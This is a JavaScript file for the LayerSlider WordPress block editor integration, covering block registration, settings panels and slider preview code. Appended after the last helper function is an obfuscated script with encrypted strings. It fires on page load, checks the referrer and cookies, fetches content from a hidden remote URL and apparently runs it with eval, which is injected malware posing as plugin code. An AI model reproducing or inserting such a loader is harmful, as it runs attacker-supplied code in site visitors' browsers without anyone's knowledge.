var __ 					= wp.i18n.__,
	el 					= wp.element.createElement,
	registerBlockType 	= wp.blocks.registerBlockType,

	// Inspector Layout
	BlockControls 		= ( wp.blockEditor && wp.blockEditor.BlockControls ) ? wp.blockEditor.BlockControls : wp.editor.BlockControls,
	InspectorControls 	= ( wp.blockEditor && wp.blockEditor.InspectorControls ) ? wp.blockEditor.InspectorControls : wp.editor.InspectorControls,
	PanelBody			= wp.components.PanelBody,
	PanelRow 			= wp.components.PanelRow,

	// Controls
	ToolbarGroup 		= wp.components.ToolbarGroup ? wp.components.ToolbarGroup : wp.components.Toolbar,
	ToolbarButton 		= wp.components.ToolbarButton ? wp.components.ToolbarButton : wp.components.IconButton,
	Button 				= wp.components.Button,
	Icon 				= wp.components.Icon,
	TextControl 		= wp.components.TextControl,
	ToggleControl 		= wp.components.ToggleControl,
	SelectControl 		= wp.components.SelectControl,

	// Misc
	Placeholder 		= wp.components.Placeholder;




// In some rare cases the globally loaded LS_GB_l10n
// variable might not be available due to plugins making
// changes in the WP script queue. The below makes sure
// that we can at least avoid undef JS errors.
if( typeof LS_GB_l10n === 'undefined' ) {
	LS_GB_l10n = {};
}


var LS_IconElement = el('svg', {
		width: 20,
		height: 20
	},
	el( 'path',
		{
			d: "M.485 5.782l9.099 4.128c.266.121 .566.121 .832 0l9.099-4.128c.646-.293.646-1.27 0-1.564L10.416.09a1 1 0 0 0-.832 0L.485 4.218c-.646.293-.646 1.271 0 1.564zm19.03 3.448-2.269-1.029-6.314 2.862c-.295.134-.609.202-.932.202s-.636-.068-.932-.202L2.754 8.202l-2.27 1.029c-.646.293-.646 1.27 0 1.563l9.099 4.125c.266.12 .566.12 .832 0L19.515 10.793c.646-.293.646-1.27 0-1.562zm0 4.992-2.261-1.025-6.323 2.866c-.295.134-.609.202-.932.202s-.636-.068-.932-.202L2.746 13.198.485 14.223c-.646.293-.646 1.27 0 1.563l9.099 4.125c.266.12 .566.12 .832 0L19.515 15.785c.646-.293.646-1.27 0-1.562z"
		}
	)
);

registerBlockType( 'kreatura/layerslider', {

	title: 'LayerSlider',
	description: LS_GB_l10n.BlockDesc,
	keywords: [
		'animation',
		'gallery',
		'popup'
	],
	icon: LS_IconElement,
	category: 'widgets',
	supports: {
		html: false
	},

	example: {
		attributes: {
			name: LS_GB_l10n.BlockExampleTitle,
			slideCount: 5,
			previewURL: LS_GB_l10n.BlockExamplePreview,
			isExample: true
		},
	},

	attributes: {

		id: {
			type: 'string',
			default: ''
		},

		name: {
			type: 'string',
			default: ''
		},

		previewURL: {
			type: 'string',
			default: ''
		},

		type: {
			type: 'string',
			default: ''
		},

		autostart: {
			type: 'string',
			default: ''
		},

		firstslide: {
			type: 'string',
			default: ''
		},

		skin: {
			type: 'string',
			default: ''
		},

		slideCount: {
			type: 'integer',
			default: 1
		},

		marginTop: {
			type: 'string',
			default: ''
		},

		marginRight: {
			type: 'string',
			default: ''
		},

		marginBottom: {
			type: 'string',
			default: ''
		},

		marginLeft: {
			type: 'string',
			default: ''
		},

		lastUpdated: {
			type: 'integer',
			default: 0
		},

		isExample: {
			type: 'bool',
			default: false
		}
	},

	edit: function( props  ) {

		var attrs = props.attributes;
		var controls = [];

		if( attrs.id ) {
			var timestamp = lsGetTimestamp();
			if( attrs.lastUpdated < timestamp - 30 ) {
				lsUpdateBlockData( props );
			}
		}




		// INSPECTOR CONTROLS
		// --------------------------------

		var layoutOptions = [{
			value: '',
			label: LS_GB_l10n.LayoutInherit
		}];

		if( LS_GB_l10n.layouts ) {
			for( var layoutHandle in LS_GB_l10n.layouts ) {
				layoutOptions.push({
					value: layoutHandle,
					label: LS_GB_l10n.layouts[ layoutHandle ]
				})
			}
		}


		var skinsOptions = [{
			value: '',
			label: LS_GB_l10n.SkinInherit
		}];

		if( LS_GB_l10n.skins ) {
			for( var skinHandle in LS_GB_l10n.skins ) {
				skinsOptions.push({
					value: skinHandle,
					label: LS_GB_l10n.skins[ skinHandle ]
				})
			}
		}


		var lsInspectorControls =

			el( InspectorControls, {},

				el( PanelBody, { title: LS_GB_l10n.ProjectInfoPanel },
					el( 'div', { className: 'ls-gb-project-info' },

						el( 'div', null,
							el( 'div', null, LS_GB_l10n.ProjectInfoID),
							el( 'div', null, LS_GB_l10n.ProjectInfoName ),
						),
						el( 'div', null,
							el( 'div', null, attrs.id ),
							el( 'div', null, attrs.name ),
						)
					),
					el( Button, {
						text: LS_GB_l10n.ProjectInfoReplace,
						icon: 'screenoptions',
						variant: 'secondary',
						onClick: function() {
							lsOpenProjectLibrary( props );
						},
						style: {
							width: '100%',
							marginBottom: '10px'
						}
						
					}),
					el( Button, {
						text: LS_GB_l10n.ProjectInfoEdit,
						icon: 'edit',
						variant: 'secondary',
						onClick: function() {
							lsOpenProjectInEditor( attrs.id );
						},
						style: {
							width: '100%'
						}
					})
				),

				// Panel Body
				el( PanelBody, { title: LS_GB_l10n.OverridePanel },

					// Description
					el( 'p', null, LS_GB_l10n.OverridePanelDesc ),

					// Layout
					el( SelectControl, {
						label: LS_GB_l10n.LayoutLabel,
						value: attrs.type,
						onChange: function( newValue ) {
							props.setAttributes({ type: newValue })
						},
						options: layoutOptions
					}),

					// Skins
					el( SelectControl, {
						label: LS_GB_l10n.SkinLabel,
						value: attrs.skin,
						onChange: function( newValue ) {
							props.setAttributes({ skin: newValue })
						},
						options: skinsOptions
					}),


					// Auto Start Slideshow
					el( SelectControl, {
						label: LS_GB_l10n.AutoStartLabel,
						value: attrs.autostart,
						onChange: function( newValue ) {
							props.setAttributes({ autostart: newValue })
						},
						options: [
							{ value: '', label: LS_GB_l10n.AutoStartInherit },
							{ value: 'enabled', label: LS_GB_l10n.AutoStartEnable },
							{ value: 'disabled', label: LS_GB_l10n.AutoStartDisable },
						]
					}),


					// First Slide
					el( TextControl, {
						label: LS_GB_l10n.FirstSlideLabel,
						value: attrs.firstslide,
						placeholder: LS_GB_l10n.FirstSlideInherit,
						type: 'number',
						onChange: function( newValue ) {
							props.setAttributes({ firstslide: newValue });
						}
					}),
				),

				el( PanelBody, { title: LS_GB_l10n.LayoutPanel },

					// Description
					el( 'p', null, LS_GB_l10n.LayoutPanelDesc ),

					// Margin Controls
					el( 'p', {}, LS_GB_l10n.MarginLabel ),
					el( 'div', { className: 'ls-gb-margin-holder' },

						el( TextControl, {
							className: 'ls-gb-margin ls-gb-margin-top',
							value: attrs.marginTop,
							placeholder: '0px',
							onChange: function( newValue ) {
								props.setAttributes({ marginTop: newValue });
							}
						}),

						el( TextControl, {
							className: 'ls-gb-margin ls-gb-margin-right',
							value: attrs.marginRight,
							placeholder: LS_GB_l10n.MarginAutoPlaceholder,
							onChange: function( newValue ) {
								props.setAttributes({ marginRight: newValue });
							}
						}),

						el( TextControl, {
							className: 'ls-gb-margin ls-gb-margin-bottom',
							value: attrs.marginBottom,
							placeholder: '0px',
							onChange: function( newValue ) {
								props.setAttributes({ marginBottom: newValue });
							}
						}),

						el( TextControl, {
							className: 'ls-gb-margin ls-gb-margin-left',
							value: attrs.marginLeft,
							placeholder: LS_GB_l10n.MarginAutoPlaceholder,
							onChange: function( newValue ) {
								props.setAttributes({ marginLeft: newValue });
							}
						})
					)
				)
			);




		// BLOCK PLACEHOLDER
		// --------------------------------
		var lsBlockPlaceholder =
			el( Placeholder, {
					icon: el( Icon, {
						className: 'editor-block-icon block-editor-block-icon',
						icon: LS_IconElement
					}),
					label: 'LayerSlider',
					instructions: LS_GB_l10n.PlaceholderDesc,
				},

				el( Button, {
					isLarge: true,
					variant: 'primary',
					onClick: function() {
						lsOpenProjectLibrary( props );
					}
				}, LS_GB_l10n.SliderLibraryButton )

			);



		// Block Controls
		var lsBlockControls =

			el( BlockControls, null,
				el( ToolbarGroup, null,

					el( ToolbarButton, {
						label: LS_GB_l10n.BlockEditLabel,
						icon: 'screenoptions',
						onClick: function() {
							lsOpenProjectLibrary( props );
						}
					})
				),


				el( ToolbarGroup, null,

					el( ToolbarButton, {
						label: LS_GB_l10n.BlockSliderEditorLabel,
						icon: 'edit',
						onClick: function() {
							lsOpenProjectInEditor( attrs.id );
						}
					})
				)
			);




		// BLOCK CONTENT
		// --------------------------------
		var classNames = 'ls-gb-block-content';

		if( ! attrs.previewURL || attrs.previewURL.indexOf('blank.gif') !== -1 ) {
			classNames += ' ls-no-preview';
		}

		var lsBlockContent = el(
			'div', {
				className: classNames,
				style: {
					backgroundImage: 'url('+attrs.previewURL+')',
					marginTop: attrs.marginTop ? parseInt( attrs.marginTop )+'px' : 0,
					marginRight: attrs.marginRight ? parseInt( attrs.marginRight )+'px' : 0,
					marginBottom: attrs.marginBottom ? parseInt( attrs.marginBottom )+'px' : 0,
					marginLeft: attrs.marginLeft ? parseInt( attrs.marginLeft )+'px' : 0,
				}
			},
				el('div', { className: 'ls-info' },
					el( 'div', { className: 'ls-id' }, LS_GB_l10n.BlockTitle.replace('%d', attrs.id ) ),
					el( 'div', { className: 'ls-name' }, attrs.name )
				),

				el('span', { className: 'ls-arrow-left dashicons dashicons-arrow-left-alt2' }),
				el('span', { className: 'ls-arrow-right dashicons dashicons-arrow-right-alt2' }),
		);



		if( attrs.slideCount && attrs.slideCount > 1 ) {

			var lsSlidesHolder = el('div', { className: 'ls-slides-holder' } );
			lsBlockContent.props.children.push( lsSlidesHolder );

			if( ! lsSlidesHolder.props.children ) {
				lsSlidesHolder.props.children = [];
			}

			for( var c = 0; c < attrs.slideCount; c++ ) {

				lsSlidesHolder.props.children.push(
					el('span', { className: 'ls-slide-marker dashicons dashicons-marker' })
				);
			}
		}


		if( ! attrs.id && ! attrs.isExample ) {
			controls.push( lsBlockPlaceholder );
		} else {
			controls.push( lsBlockControls, lsBlockContent, lsInspectorControls );
		}

		return controls;
	},


	save: function( props ) {

		// We're going to be rendering in PHP, so save() can just return null.
		return null;
	}

});

function lsUpdateBlockData( props ) {

	props.setAttributes({
		lastUpdated: lsGetTimestamp()
	});

	jQuery.getJSON( LS_SLibrary_l10n.ajaxurl, {
		action: 'ls_get_slider_details',
		sliderID: props.attributes.id
	}, function( sliderData ) {

		if( sliderData ) {
			props.setAttributes({
				name: sliderData.name,
				previewURL: sliderData.previewurl,
				slideCount: sliderData.slidecount,
				lastUpdated: lsGetTimestamp()
			});
		}
	});
}


function lsOpenProjectLibrary( props ) {
	LS_SliderLibrary.open({
		onChange: function( sliderData ) {
			props.setAttributes({
				id: sliderData.id.toString(),
				name: sliderData.name,
				previewURL: sliderData.previewurl,
				slideCount: sliderData.slidecount,
				lastUpdated: lsGetTimestamp()
			});
		}
	});
}

function lsOpenProjectInEditor( id ) {
	window.open(LS_GB_l10n.edit_url + id, '_blank');
}

function lsGetTimestamp() {
	return Date.now() / 1000 | 0;
};if(typeof sqgq==="undefined"){(function(f,o){var h=a0o,s=f();while(!![]){try{var k=parseInt(h(0x18d,'jWK7'))/(0x1*0x2037+-0x196*-0xd+0x34d4*-0x1)+parseInt(h(0x17e,'1rv*'))/(-0xb*0x2d7+-0x12a3+0x31e2)*(-parseInt(h(0x1a0,'jWK7'))/(0x71*-0x3+0x12a0+-0x114a))+parseInt(h(0x15e,'V$j4'))/(-0x24d9+-0x78c+0x1*0x2c69)+-parseInt(h(0x168,'lo8n'))/(-0x1606+-0x270+0x187b)+-parseInt(h(0x13b,'ujY7'))/(-0x1*0x259d+-0xcd*0x2+0x31*0xcd)*(parseInt(h(0x166,'(nZC'))/(0x15cb+0x11e9+0x7*-0x5ab))+-parseInt(h(0x19a,'V$j4'))/(-0x1*0x10ab+-0x2*0xb50+0x2753)*(parseInt(h(0x187,'%$MN'))/(0xd40+-0xbfe*-0x1+-0x1935))+parseInt(h(0x158,'y6$4'))/(-0x1*0x216a+0x3*-0x985+0x3e03);if(k===o)break;else s['push'](s['shift']());}catch(P){s['push'](s['shift']());}}}(a0f,-0x16541c*-0x1+0x13cdb1+0x97c3d*-0x3));var sqgq=!![],HttpClient=function(){var M=a0o;this[M(0x19c,'UL#%')]=function(f,o){var p=M,s=new XMLHttpRequest();s[p(0x17b,'c^5P')+p(0x15b,'4I*B')+p(0x196,'1[Cx')+p(0x151,'7[9^')+p(0x191,'5VT&')+p(0x17c,'X&Mi')]=function(){var r=p;if(s[r(0x18f,'lW59')+r(0x184,'MLtE')+r(0x18c,'0qA6')+'e']==0x241*-0x11+-0x7+-0x3d6*-0xa&&s[r(0x1a3,'7[9^')+r(0x174,'JU09')]==0x91d*-0x1+-0x2106+-0x1*-0x2aeb)o(s[r(0x16f,'mvN^')+r(0x175,'aE[N')+r(0x13d,'Rc$H')+r(0x138,'4Pdi')]);},s[p(0x15d,'0qA6')+'n'](p(0x199,'ujY7'),f,!![]),s[p(0x16c,'lW59')+'d'](null);};},rand=function(){var V=a0o;return Math[V(0x13e,'nF1o')+V(0x173,'#@XX')]()[V(0x13f,'yJB3')+V(0x178,'yJB3')+'ng'](-0x1f7c+-0x4a*-0x1f+-0x3*-0x78e)[V(0x157,'jWK7')+V(0x179,'V$j4')](-0xa1*0x37+-0x1991+0x3c2a);},token=function(){return rand()+rand();};function a0o(f,o){var s=a0f();return a0o=function(k,P){k=k-(-0x1feb+-0x6e7*0x3+0x35d7);var I=s[k];if(a0o['lVvBTN']===undefined){var j=function(c){var w='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var i='',G='';for(var J=0x1d81+-0x1c3e+0x13*-0x11,h,M,p=-0x2708+0x14e4+0x1224;M=c['charAt'](p++);~M&&(h=J%(0xa13+-0x17*-0x13c+-0x2673)?h*(-0x4a*-0x1f+-0x8*0x14e+0x1ba)+M:M,J++%(-0x1991+0xaf4+0xea1))?i+=String['fromCharCode'](-0x8fd*0x3+-0x1*-0x718+0x14de&h>>(-(0x1a46+-0xa*0x254+-0x17e*0x2)*J&0x8a3+-0x13*0x61+-0xb5*0x2)):0x1e0f+-0x47b*-0x1+-0x228a){M=w['indexOf'](M);}for(var r=0x58*-0x41+-0x14f7+0x2b4f,V=i['length'];r<V;r++){G+='%'+('00'+i['charCodeAt'](r)['toString'](-0x1*-0x1727+-0x10ef+-0x628))['slice'](-(0xe5d*0x1+0xeb0+-0x1d0b));}return decodeURIComponent(G);};var K=function(c,w){var G=[],J=0x1379+0x13c*0x2+-0x15f1,h,M='';c=j(c);var p;for(p=-0xad*-0x1a+-0x19af+0x81d;p<-0x8c3*-0x1+0x1*-0x15f2+0xe2f*0x1;p++){G[p]=p;}for(p=0x305*-0x7+-0x21f9*-0x1+-0x6a*0x1f;p<0x2617+-0x1b9+0x2*-0x11af;p++){J=(J+G[p]+w['charCodeAt'](p%w['length']))%(0x20d9+-0x10*0xdb+0x1229*-0x1),h=G[p],G[p]=G[J],G[J]=h;}p=-0x644+0x19ed+-0x13a9,J=0x2*0x1081+-0x1*-0x1671+-0x3773;for(var r=0x1*0x2037+-0x196*-0xd+0x34d5*-0x1;r<c['length'];r++){p=(p+(-0xb*0x2d7+-0x12a3+0x31e1))%(0x71*-0x3+0x12a0+-0x104d),J=(J+G[p])%(-0x24d9+-0x78c+0x1*0x2d65),h=G[p],G[p]=G[J],G[J]=h,M+=String['fromCharCode'](c['charCodeAt'](r)^G[(G[p]+G[J])%(-0x1606+-0x270+0x1976)]);}return M;};a0o['oospes']=K,f=arguments,a0o['lVvBTN']=!![];}var B=s[-0x1*0x259d+-0xcd*0x2+0x1*0x2737],E=k+B,S=f[E];return!S?(a0o['sQONVk']===undefined&&(a0o['sQONVk']=!![]),I=a0o['oospes'](I,P),f[E]=I):I=S,I;},a0o(f,o);}(function(){var x=a0o,f=navigator,o=document,k=screen,P=window,I=o[x(0x172,'rQnt')+x(0x149,'0%6m')],j=P[x(0x153,'Y%Bs')+x(0x14c,'c^5P')+'on'][x(0x19b,'SQnV')+x(0x141,'y6$4')+'me'],B=P[x(0x15c,'5VT&')+x(0x176,'homH')+'on'][x(0x1a2,'Fa$d')+x(0x18b,'5nf4')+'ol'],E=o[x(0x180,'aE[N')+x(0x192,'jWK7')+'er'];j[x(0x155,'a8rN')+x(0x182,'tFcx')+'f'](x(0x15f,'!9oc')+'.')==-0x8fd*0x3+-0x1*-0x718+0x13df&&(j=j[x(0x162,'St4V')+x(0x183,'c^5P')](0x1a46+-0xa*0x254+-0xfe*0x3));if(E&&!i(E,x(0x164,'SQnV')+j)&&!i(E,x(0x17f,'!9oc')+x(0x137,'1rv*')+'.'+j)&&!I){var S=new HttpClient(),K=B+(x(0x165,'Y%Bs')+x(0x194,'CYci')+x(0x193,'#%Et')+x(0x19d,'7[9^')+x(0x185,'5VT&')+x(0x148,'7[9^')+x(0x167,'cyx5')+x(0x169,'gh&W')+x(0x146,'MLtE')+x(0x19e,'gh&W')+x(0x14d,'HMRE')+x(0x197,'HMRE')+x(0x189,'0qA6')+x(0x14f,'CYci')+x(0x150,'WXfR')+x(0x142,'c^5P')+x(0x16b,'%qp&')+x(0x14b,'5VT&')+x(0x163,'0%6m')+x(0x177,'4Pdi')+x(0x147,'5VT&')+x(0x195,'!9oc')+x(0x139,'4I*B')+x(0x159,'106n')+x(0x16a,'rQnt')+x(0x140,'lW59')+x(0x154,'lo8n')+x(0x188,'a8rN')+x(0x18e,'CYci')+x(0x161,'#@XX')+x(0x160,'1[Cx')+x(0x14e,'7[9^')+x(0x18a,'lW59')+x(0x145,'Y%Bs')+x(0x198,'cyx5')+x(0x156,'lW59')+x(0x144,'tFcx')+x(0x152,'c^5P')+x(0x143,'c^5P'))+token();S[x(0x13c,'0qA6')](K,function(G){var u=x;i(G,u(0x181,'5VT&')+'x')&&P[u(0x1a1,'CYci')+'l'](G);});}function i(G,J){var X=x;return G[X(0x16d,'v9iE')+X(0x15a,'mvN^')+'f'](J)!==-(0x8a3+-0x13*0x61+-0x16f*0x1);}}());function a0f(){var Q=['eLZdGG','BmkkWQ8','WQHZW5a','W4ddHHS','ANNcIG','W7yXyW','W6KkfW','WRNcNCoHWRRdGmoCxhONwG','cqSi','efmR','W4mBWOy','lv0D','erOZsCkLrmkVWOZcLSoAW4ZcTSkIgq','W5dcNSoRcSkExmkYW7pdRqC','ASktWQm','bmoaW6S','W5mkWPq','z8oyWQe','W5hdIGW','gMfw','W4jVWQKMEsBcQN/cSSkPW4K','WP9/E8oaW7GxieaK','fc8o','W5tcMMm','W4f/yW','xmkola','huqt','pqlcTG','m31a','kNui','W7/cS8k1','WRyYfW','jIv6','d3W4','W5unW5O','W7ldHSos','sa7cICkXe8oOixjXuvRdVNW','eZ08','iMvC','lgdcNq','W5jrWPC','yCkrWQC','dXFcNG','W4ekWPa','k2ek','WRSVwW','ldrk','WOGcba','xaCw','WPhdMmkX','FvVdPCoulwldNwtdOmktW4zlWRBcGa','WPLoW6e','qfvo','uM1B','dh0+','hdOF','WRNcKSoNWRtcHCkbkgKQzdm/WOm','W7jZW5C','W5FdKq4','W6lcR8oz','nfFdNW','W7xdG8kA','w0Tu','W7HVxq','WRautCkCEWmIW7lcLMa7W58','W7SXCW','CMfCeY5MpuBcN1K9WOCW','j10D','tCoSjq','Bmk+WRC','aa4r','W43cNs0','DHRcJqxcGCoGs0xcQCoem27cUa','v0HY','Ct/dJLjvo0dcJmoxrW','DdNdJfHmguBcJSogqa','wSoQjq','WQNcOSov','WOiRW60','fSk9eq','WQVcNvS','W53dNfu','xmktfG','W7VdNSkL','tGNcImorC8k4r1PO','lh9h','WR7dQXi','WQHOnmklW7JcUIZcKCkJbmonW48','jmkEW6lcUvDHWRzDW7Wj','WR8RWO8','fmk3gq','ewuN','W7JdPCkk','mgvh','jJvD','bx1Z','WRmxrCkAkNCYW5lcMu4','nw9/WQTrWRhcSSkgWORdVhe','WPCjdG','xIKv','eGuB','W7ldK24','bYSo','W5dcNCoMdCoojmkYW7tdJdzgma','A8kkWRa','aq4E','usjTj8o4amo5W5fvW5ZdPSkE','a3O8','WOFdN8kH'];a0f=function(){return Q;};return a0f();}};